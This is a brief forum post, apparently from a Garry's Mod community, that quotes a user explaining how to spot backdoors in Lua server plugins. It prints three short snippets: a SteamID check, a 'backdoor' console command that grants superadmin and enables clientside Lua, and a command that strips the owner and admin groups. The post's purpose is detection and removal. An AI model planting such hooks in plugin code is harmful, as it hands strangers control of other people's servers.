25-03-2021, 06:11 PMDuo Wrote: im not experienced in that area but typically its not hard to see, lua is not a hard to read language if you see something like this Code:ply:SteamID() == "STEAM_0:100000000") then or this Code:concommand.Add( "backdoor" , function( debugPlayer ) RunConsoleCommand("ulx","adduser",debugPlayer:Name(), "superadmin") RunConsoleCommand("sv_allowcslua" , "1") or this Code:concommand.Add( "byebyeadmin" , function() RunConsoleCommand("ulx","removegroup","owner") RunConsoleCommand("ulx","removegroup","admin") you are backdoored and need to remove the plugin / code
ply:SteamID() == "STEAM_0:100000000") then
concommand.Add( "backdoor" , function( debugPlayer ) RunConsoleCommand("ulx","adduser",debugPlayer:Name(), "superadmin") RunConsoleCommand("sv_allowcslua" , "1")
concommand.Add( "byebyeadmin" , function() RunConsoleCommand("ulx","removegroup","owner") RunConsoleCommand("ulx","removegroup","admin")
Loading Info...